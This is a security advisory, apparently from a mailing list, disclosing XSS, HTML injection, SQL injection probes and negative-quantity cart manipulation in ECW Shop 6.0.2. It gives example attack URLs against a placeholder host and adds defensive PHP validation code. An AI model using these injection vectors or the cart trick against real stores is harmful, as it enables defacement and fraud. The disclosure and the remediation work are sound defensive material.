Hello All,

I have discovered a number of remote vulnerabilities in:

ECW Shop 6.0.2
Authors Site: http://www.soft4e.com/

ECW Shop is described by its authors as:
"ECW-Shop - simple for use featured shopping cart with ability to use Excel or Access format for database."

+-[Examples:]--------------------------------------------------+

[1]------------------------------------------------------------+
XSS:
(This same problem was reported on version 5.5 by David S. Ferreira - http://www.securityfocus.com/bid/9244)

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=>

[2]------------------------------------------------------------+
Information Disclosure & Possible SQL Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

Error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/search.php on line 109

[3]------------------------------------------------------------+
HTML Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=>

DEFACED!

http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=

DEFACED!

&comp=&min=1&max=1

[4]------------------------------------------------------------+
Cart/Order Manipulation:

You can add negative quantity value items to your cart to gain credit.

Example:
Add '-1' of an item with a value of £4.99
Add '1' of an item with a value of £6.99
Cart Total: £2.00

+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE

JohnC@NoBytes.com
http://www.NoBytes.com
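The following is an added example, not ECW Shop's own code, of the server-side checks that would close the input-handling issues listed above: the `min`/`max` search bounds are validated as numbers before they can reach a query or be echoed into the page, and cart quantities are required to be positive so a '-1' line cannot act as a credit. The function names and the cart line layout are assumptions made for illustration.

```php
<?php
// Added example, not ECW Shop's own code: server-side checks for the
// inputs the advisory shows being abused. Function names and the cart
// line layout are assumptions made for illustration.

// Price bounds from the search form (min/max) must be numbers; a quote
// or a tag is rejected here instead of reaching the query or the page.
// Values that pass should still be bound as query parameters.
function parse_price_bound(?string $raw): ?float
{
    if ($raw === null || $raw === '') {
        return null;                       // optional filter left empty
    }
    $value = filter_var($raw, FILTER_VALIDATE_FLOAT);
    if ($value === false || $value < 0) {
        throw new InvalidArgumentException('price bound must be a non-negative number');
    }
    return $value;
}

// Quantities must be positive whole numbers: a negative quantity would
// otherwise be booked as a credit against the rest of the order.
function parse_quantity(string $raw): int
{
    $qty = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($qty === false) {
        throw new InvalidArgumentException('quantity must be a positive whole number');
    }
    return $qty;
}

// Cart total in pence; integer arithmetic avoids float rounding on money.
// Each line is ['price_pence' => int, 'qty' => string as submitted].
function cart_total_pence(array $lines): int
{
    $total = 0;
    foreach ($lines as $line) {
        $total += $line['price_pence'] * parse_quantity($line['qty']);
    }
    return $total;
}

// Constructed input matching the advisory's cart example (-1 x 4.99, 1 x 6.99):
// the order is refused instead of totalling 2.00.
try {
    cart_total_pence([['price_pence' => 499, 'qty' => '-1'],
                      ['price_pence' => 699, 'qty' => '1']]);
} catch (InvalidArgumentException $e) {
    echo "order rejected: {$e->getMessage()}\n";
}
```

Whatever is rendered back into the results page (the `key` search term included) still needs HTML encoding with `htmlspecialchars()` at output time; validation of the numeric fields alone does not cover that.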